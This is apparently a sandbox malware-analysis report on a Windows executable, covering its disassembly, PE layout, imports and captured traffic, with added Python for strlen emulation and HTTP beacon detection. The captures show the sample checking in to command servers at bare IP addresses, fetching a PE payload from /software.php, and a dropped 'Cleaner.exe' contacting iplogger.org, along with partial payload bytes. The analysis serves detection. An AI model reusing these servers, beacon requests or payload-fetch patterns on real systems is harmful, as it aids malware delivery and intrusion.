                                                      cmp ecx, dword ptr [00435A7Ch]
                                                      jne 00007F16B8E0C6B4h
                                                      rep ret
                                                      jmp 00007F16B8E0F983h
                                                      push eax
                                                      push dword ptr fs:[00000000h]
                                                      lea eax, dword ptr [esp+0Ch]
                                                      sub esp, dword ptr [esp+0Ch]
                                                      push ebx
                                                      push esi
                                                      push edi
                                                      mov dword ptr [eax], ebp
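The listing above is the code at the entry point 0x404be7 and what follows it, and none of it is sample-specific: the opening `call`/`jmp` pair is the entry stub MSVC's CRT emits (the call initialises the stack cookie, the jmp continues into the CRT start-up routine), the routine after the `int3` padding is the CRT's strlen, which scans four bytes per iteration using the constants 7EFEFEFFh and 81010100h, the `cmp ecx, dword ptr [00435A7Ch] ... rep ret` block is the stack-cookie check, and the `push dword ptr fs:[00000000h]` sequence is the SEH prolog. The Python below is an added example, not part of the Joe Sandbox report: it transcribes the strlen routine instruction by instruction so that the behaviour of the two constants can be verified, including the spurious hit the word test produces for a top byte of 0x80, which the re-check of the individual bytes absorbs. The constants come from the listing; the test strings and the `place` helper that lays them out in a zero-padded buffer are constructed for the example.

```python
# Added example: emulation of the MSVC CRT strlen from the entry-point listing.
MASK32 = 0xFFFFFFFF
MAGIC_ADD = 0x7EFEFEFF    # mov edx, 7EFEFEFFh
MAGIC_TEST = 0x81010100   # test eax, 81010100h


def word_may_contain_nul(word):
    """The four-bytes-at-a-time test from the listing.

    Mirrors:  add edx, eax / xor eax, FFFFFFFFh / xor eax, edx / test eax, 81010100h
    Adding 0x7EFEFEFF carries out of every byte that is non-zero; bits 8, 16,
    24 (and 31 for the top byte) of ~word ^ sum are set where a carry was
    missing.  The test never misses a NUL but can fire spuriously (for example
    when the top byte is 0x80), which is why the listing re-checks each byte.
    """
    edx = (word + MAGIC_ADD) & MASK32
    eax = ((word ^ MASK32) ^ edx) & MASK32
    return (eax & MAGIC_TEST) != 0


def crt_strlen(mem, addr):
    """Length of the NUL-terminated string at mem[addr], computed as the listing does."""
    ecx = addr
    # Byte loop until ecx is 4-byte aligned (test ecx, 3 / jne back to the top).
    while ecx & 3:
        al = mem[ecx]
        ecx += 1
        if al == 0:
            return ecx - 1 - addr          # lea eax, [ecx-1]; sub eax, [esp+4]
    # Aligned word loop: one 32-bit load per iteration, ecx already advanced by 4.
    while True:
        word = int.from_bytes(mem[ecx:ecx + 4], "little")
        ecx += 4
        if not word_may_contain_nul(word):
            continue
        if (word & 0x000000FF) == 0:       # test al, al
            return ecx - 4 - addr
        if (word & 0x0000FF00) == 0:       # test ah, ah
            return ecx - 3 - addr
        if (word & 0x00FF0000) == 0:       # test eax, 00FF0000h
            return ecx - 2 - addr
        if (word & 0xFF000000) == 0:       # test eax, FF000000h
            return ecx - 1 - addr
        # Spurious hit: jmp back to the word loop.


def place(s, offset):
    """Constructed test memory: `s` at `offset`, NUL-terminated and zero-padded so
    the 4-byte reads never run off the buffer (the CRT relies on page alignment
    for the same guarantee)."""
    buf = bytearray(offset) + s + b"\x00"
    buf += bytes(-len(buf) % 4 + 4)
    return bytes(buf), offset


def agrees_with_len(samples):
    """True if the emulation returns len(s) for every sample at every alignment."""
    return all(crt_strlen(*place(s, off)) == len(s)
               for s in samples for off in range(4))


if __name__ == "__main__":
    samples = [b"", b"a", b"hello, world", b"\x80\x80\x80\x80abc",
               b"\xff\x01\xfe\x7f\x80\x81"]
    print("spurious hit on b'abc\\x80':", word_may_contain_nul(0x80636261))
    print("all samples agree with len():", agrees_with_len(samples))
```

Recognising this routine saves time in the debugger: a breakpoint on it fires on every CRT string operation, and the `00435A7Ch` cookie address is stable across runs because the image has no relocations and no DYNAMIC_BASE flag.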
                                                      Programming Language:
                                                      • [ASM] VS2008 build 21022
                                                      • [ C ] VS2008 build 21022
                                                      • [IMP] VS2005 build 50727
                                                      • [C++] VS2008 build 21022
                                                      • [RES] VS2008 build 21022
                                                      • [LNK] VS2008 build 21022
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xe0ec           0x50          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x191000         0x4bf8        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x1210           0x1c          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x2c78           0x18          .text
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x2c30           0x40          .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x1000           0x1d8         .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

The base relocation directory is empty, RELOCS_STRIPPED is set and DLL Characteristics lacks DYNAMIC_BASE, so the image always loads at 0x400000; absolute addresses seen in the disassembly are stable across runs.
Name   Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy            Characteristics
.text  0x1000           0xdbe4        0xdc00    False     0.4849609375        data       5.899490920975358  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data  0xf000           0x181d1c      0x27600   False     0.9495845734126984  data       7.865940586372942  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc  0x191000         0x4bf8        0x4c00    False     0.5913342927631579  data       5.603732133139699  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

The .data section is writable, has an entropy of 7.87 out of 8 and a virtual size (0x181d1c) about six times its raw size (0x27600): the on-disk bytes look encrypted or compressed and the loader reserves far more memory than the file supplies, the layout expected when a payload is unpacked in place at run time.
Name            RVA       Size    Type
RT_ICON         0x1912b0  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors
RT_ICON         0x191b58  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 9216
RT_ICON         0x194100  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 4096
RT_STRING       0x1953a8  0x42    data
RT_STRING       0x1953f0  0x280   data
RT_STRING       0x195670  0x3ce   data
RT_STRING       0x195a40  0x1b2   data
RT_ACCELERATOR  0x1951d8  0x80    data
RT_GROUP_ICON   0x1951a8  0x30    data
RT_VERSION      0x195268  0x140   MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79 (a libmagic false match: an RT_VERSION resource is a VS_VERSIONINFO block, not an executable)
None            0x195258  0xa     data

The Language and Country columns are empty for every resource.
DLL           Imports
KERNEL32.dll  LoadLibraryA, InterlockedPushEntrySList, GetConsoleAliasesA, ReadFile, ReadConsoleW, GetVolumeInformationA, GetComputerNameA, LocalFree, InterlockedDecrement, SetSystemTimeAdjustment, SetLocaleInfoA, FindNextVolumeA, FindNextChangeNotification, CopyFileExA, MoveFileWithProgressW, VerifyVersionInfoW, LocalSize, FileTimeToDosDateTime, DebugBreak, GlobalGetAtomNameA, IsBadWritePtr, FindResourceA, GetComputerNameExA, GetProcAddress, GetStringTypeW, GetFileTime, GetConsoleAliasesLengthW, GetVolumeNameForVolumeMountPointA, DeleteVolumeMountPointA, GetCPInfo, GetQueuedCompletionStatus, MoveFileWithProgressA, CopyFileA, lstrcpynW, WriteConsoleW, GetBinaryTypeW, WriteConsoleOutputA, GetCommandLineA, InterlockedIncrement, CreateActCtxW, FormatMessageA, GetModuleHandleW, GetModuleHandleA, EnterCriticalSection, GetStringTypeExA, OpenMutexW, FindResourceW, RtlCaptureContext, InterlockedExchange, InitializeCriticalSectionAndSpinCount, DeleteFiber, InterlockedExchangeAdd, EnumDateFormatsA, GetPrivateProfileStructA, GetNamedPipeHandleStateW, RegisterWaitForSingleObject, LocalAlloc, QueryMemoryResourceNotification, SetLastError, GetProcessPriorityBoost, GetMailslotInfo, HeapWalk, SetFilePointer, SetConsoleMode, RaiseException, RtlUnwind, GetLastError, MoveFileA, DeleteFileA, GetStartupInfoA, HeapAlloc, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, DeleteCriticalSection, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LeaveCriticalSection, VirtualAlloc, HeapReAlloc, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, MultiByteToWideChar, LCMapStringA, LCMapStringW
USER32.dll    CharUpperBuffW
WINHTTP.dll   WinHttpCreateUrl
TCP packets

Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Oct 3, 2022 17:29:56.533652067 CEST  49693        80         192.168.2.5    208.67.104.97
Oct 3, 2022 17:29:56.561080933 CEST  80           49693      208.67.104.97  192.168.2.5
Oct 3, 2022 17:29:56.561252117 CEST  49693        80         192.168.2.5    208.67.104.97
Oct 3, 2022 17:29:56.561955929 CEST  49693        80         192.168.2.5    208.67.104.97
Oct 3, 2022 17:29:56.589442968 CEST  80           49693      208.67.104.97  192.168.2.5
Oct 3, 2022 17:29:58.568043947 CEST  80           49693      208.67.104.97  192.168.2.5
Oct 3, 2022 17:29:58.568248987 CEST  49693        80         192.168.2.5    208.67.104.97
Oct 3, 2022 17:29:59.656677961 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.684041977 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.684155941 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.693042994 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.720258951 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.721107960 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.721162081 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.721191883 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.721223116 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.721255064 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.721254110 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.721254110 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.721286058 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.721317053 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.721318007 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.721317053 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.721352100 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.721360922 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.721385956 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.721390009 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.721417904 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.721421957 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.721456051 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.748449087 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.748493910 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.748516083 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.748538017 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.748544931 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.748559952 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.748583078 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.748598099 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.748605967 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.748626947 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.748630047 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.748652935 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.748655081 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.748678923 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.748697042 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.748703003 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.748725891 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.748733044 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.748749018 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.748770952 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.748778105 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.748795033 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.748815060 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.748816013 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.748837948 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.748838902 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.748862028 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.748872042 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.748883963 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.748894930 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.748908043 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.748922110 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.748960018 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.776179075 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.776266098 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.776303053 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.776340961 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.776341915 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.776377916 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.776407957 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.776415110 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.776427031 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.776452065 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.776454926 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.776489019 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.776490927 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.776526928 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.776535034 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.776566982 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.776566982 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.776606083 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.776606083 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.776648045 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.776648045 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.776684046 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.776684999 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.776724100 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.776726007 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.776761055 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.776762009 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.776798964 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.776801109 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.776838064 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.776838064 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.776876926 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.776879072 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.776918888 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.776926994 CEST  49694        80         192.168.2.5    85.31.46.167
Oct 3, 2022 17:29:59.776963949 CEST  80           49694      85.31.46.167   192.168.2.5
Oct 3, 2022 17:29:59.776963949 CEST  49694        80         192.168.2.5    85.31.46.167
UDP packets

Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Oct 3, 2022 17:30:46.893327951 CEST  56894        53         192.168.2.5  8.8.8.8
Oct 3, 2022 17:30:46.912929058 CEST  53           56894      8.8.8.8      192.168.2.5

DNS queries

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name          Type            Class        DNS over HTTPS
Oct 3, 2022 17:30:46.893327951 CEST  192.168.2.5  8.8.8.8  0x4d71    Standard query (0)  iplogger.org  A (IP address)  IN (0x0001)  false

DNS answers

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name          CName  Address         Type            Class        DNS over HTTPS
Oct 3, 2022 17:30:46.912929058 CEST  8.8.8.8    192.168.2.5  0x4d71    No error (0)  iplogger.org         148.251.234.83  A (IP address)  IN (0x0001)  false
                                                      • iplogger.org
                                                      • 208.67.104.97
                                                      • 85.31.46.167
                                                      • 107.182.129.235
                                                      • 171.22.30.106
Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.5  49701        148.251.234.83  443               C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe
Timestamp  kBytes transferred  Direction  Data
(no payload recorded for this TLS session)

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
1           192.168.2.5  49693        208.67.104.97   80                C:\Users\user\Desktop\file.exe
Timestamp                            kBytes transferred  Direction  Data
Oct 3, 2022 17:29:56.561955929 CEST  0                   OUT        GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: 1
    Host: 208.67.104.97
    Connection: Keep-Alive
    Cache-Control: no-cache
Oct 3, 2022 17:29:58.568043947 CEST  0                   IN         HTTP/1.1 200 OK
    Date: Mon, 03 Oct 2022 15:29:56 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 30
    Data Ascii: 0
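The two plaintext sessions from file.exe are a check-in (GET .../ping.php?sub=NOSUB&stream=start&substream=mixinte with User-Agent: 1 to a bare-IP Host) answered with a single byte, and, in session 2 below, the fetch of /software.php with User-Agent: D that is answered with application/octet-stream, Content-Disposition: attachment; filename="dll" and a body beginning with MZ. The Python below is an added example, not part of the Joe Sandbox report: it turns those observations into checks that run over raw HTTP messages. The messages are constructed from the headers shown in these two sessions (the Accept-* lines are dropped and the download body is cut to its first 16 bytes); the benign browser request used for contrast, including its hostname and User-Agent string, is made up.

```python
import re
from ipaddress import ip_address

# Constructed from the two HTTP sessions in this report (headers copied,
# download body shortened to 16 bytes).
BEACON_REQUEST = (
    b"GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte HTTP/1.1\r\n"
    b"Accept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\n"
    b"User-Agent: 1\r\n"
    b"Host: 208.67.104.97\r\n"
    b"Connection: Keep-Alive\r\n\r\n"
)
BEACON_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Length: 1\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n\r\n0"
)
DOWNLOAD_REQUEST = (
    b"GET /software.php HTTP/1.1\r\n"
    b"User-Agent: D\r\n"
    b"Host: 85.31.46.167\r\n"
    b"Connection: Keep-Alive\r\n\r\n"
)
DOWNLOAD_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b'Content-Disposition: attachment; filename="dll";\r\n'
    b"Content-Length: 242176\r\n"
    b"Content-Type: application/octet-stream\r\n\r\n"
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
)
# Made-up benign request for contrast (hostname and UA are not from the report).
BROWSER_REQUEST = (
    b"GET /index.html HTTP/1.1\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/105.0\r\n"
    b"Host: www.example.com\r\n\r\n"
)

BROWSER_UA = re.compile(r"^[A-Za-z][\w.-]*/\d")   # "Product/version ..." shape


def split_message(raw):
    """Return (start line, {lower-case header name: value}, body) of a raw HTTP message."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def is_ip_literal(host):
    """True if the Host header is an IPv4 address (optionally with :port)."""
    try:
        ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def request_findings(raw):
    """Indicators visible in both of the sample's requests."""
    _, headers, _ = split_message(raw)
    findings = []
    if not BROWSER_UA.match(headers.get("user-agent", "")):
        findings.append("non-browser-user-agent")
    if is_ip_literal(headers.get("host", "")):
        findings.append("ip-literal-host")
    return findings


def response_findings(raw):
    """Indicators of an executable being served, as in the /software.php reply."""
    _, headers, body = split_message(raw)
    findings = []
    if body[:2] == b"MZ":
        findings.append("pe-in-body")
    m = re.search(r'filename="?([^";]*)', headers.get("content-disposition", ""))
    if m and "." not in m.group(1):
        findings.append("attachment-without-extension")
    if headers.get("content-type", "").startswith("application/octet-stream"):
        findings.append("octet-stream")
    return findings


if __name__ == "__main__":
    print("beacon request  :", request_findings(BEACON_REQUEST))
    print("download request:", request_findings(DOWNLOAD_REQUEST))
    print("download reply  :", response_findings(DOWNLOAD_RESPONSE))
    print("browser request :", request_findings(BROWSER_REQUEST))
```

Each check on its own is noisy (internal tooling talks to IP literals, some updaters send odd User-Agents); what makes these sessions stand out is the combination of a one-character User-Agent, a bare-IP Host and a PE body served under a filename with no extension, so score the findings together per connection rather than alerting on any single one.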


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      2192.168.2.54969485.31.46.16780C:\Users\user\Desktop\file.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 3, 2022 17:29:59.693042994 CEST1OUTGET /software.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: D
                                                      Host: 85.31.46.167
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:29:59.721107960 CEST | 3 | IN | HTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:29:59 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Pragma: public
                                                      Expires: 0
                                                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                      Cache-Control: private
                                                      Content-Disposition: attachment; filename="dll";
                                                      Content-Transfer-Encoding: binary
                                                      Content-Length: 242176
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: application/octet-stream
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 
03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}*:s(**2rp(;&*Vrprp*(*>}*(Co(D(E}(F(E(G&*>}*(Co(D}(F(E(H&*"*>}*R} { oo*{
